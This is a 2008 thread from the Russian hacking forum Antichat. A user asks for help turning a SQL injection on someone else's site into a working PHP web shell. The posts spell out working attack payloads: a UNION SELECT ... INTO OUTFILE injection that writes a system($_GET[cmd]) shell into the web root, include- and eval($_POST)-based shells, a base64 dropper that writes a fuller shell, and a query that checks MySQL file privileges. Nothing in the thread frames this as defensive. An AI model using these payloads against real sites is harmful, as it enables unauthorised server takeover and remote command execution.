Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.01.2008, 19:49
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605
Репутация:
13
|
|
Заливка php шелла
В общем имеется дырявый сайт с инъекцией http://site.com/bug.php?&id=-1' union select 1,2/*
Пытаюсь залить на него php-shell: http://site.com/bug.php?&id=-1' union select <? system($_GET[cmd]);?>,2 into outfile '/www/site/shell.php'/*
Шелл shell.php успешно создается но при попытке исполнить команду http://site.com/shell.php?cmd= ничего не выводится. Пытался использовать и exec() и passthru() - результат тот же. Функции system(),exec() и passthru() не задизейблены.
Подскажите что не так?
ЗЫ сервер крутится на винде
|
|
|
08.01.2008, 20:05
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
<? include($_GET[blablabla]);?>
|
|
|
|
08.01.2008, 20:18
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605
Репутация:
13
|
|
И что? Как я понял это даст произвольные файлы инклудить а мне бы команды выполнять
|
|
|
|
08.01.2008, 20:58
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Омфг. Инклудишь шелл, дальше работай шеллом. Удобнее как ни крути.
|
|
|
|
08.01.2008, 21:00
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
моё решение, заливаешь шелл вида
<?php eval($_POST['shell'])?>
создаёшь html файл с кодом
Код:
<html>
<body>
<form action=[адрес шелла]>
<textarea name='shell'>
</textarea>
</body>
</html>
Затем берёшь и перегоняешь весь код шелла в base64 и пишешь нечто такое -
Код:
$fh=fopen('newshell.php','w');
fputs($fh,base64_decode('шелл в бэйс64'));
fclose($fh);
Вставляешь в textarea и отправляешь
Вот примерно так
Последний раз редактировалось Termin@L; 08.01.2008 в 21:22..
|
|
|
|
08.01.2008, 21:10
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
http://site.com/bug.php?&id=-1' union select file_priv,2 from mysql.user/*
Если Y будет, то можно будет INTO OUTFILE, если N, то соответсвенно низя (ну и если выругается, что доступа нет - тоже)
|
|
|
|
08.01.2008, 21:12
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Basurman, и зачем ему это? пздц, ты вообще первый пост читал?
ty13r, делай то что тебе Слип говорит
ЗЫ Ты кстати какие команды пытался выполнить?
|
|
|
|
08.01.2008, 21:14
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
вот к этому
Шелл shell.php успешно создается
P.S. пздц, а то непохек |
|
|
|
08.01.2008, 21:17
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
ты што, наркоман? у него файл создаётся соответственно у юзера file_priv = 1, нахуя ему их узнавать то теперь раз он уже смог файл залить? ты сам понял чё написал?
|
|
|
|
08.01.2008, 21:23
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
Spyder
это не всегда удобно так как пост запросы сразу отпадают, а соответственно и заливка файлов на сервер
2Basurman
а ты знаешь что к таблице mysql.user вобще обычно доступ закрыт?
Последний раз редактировалось Termin@L; 08.01.2008 в 21:25..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
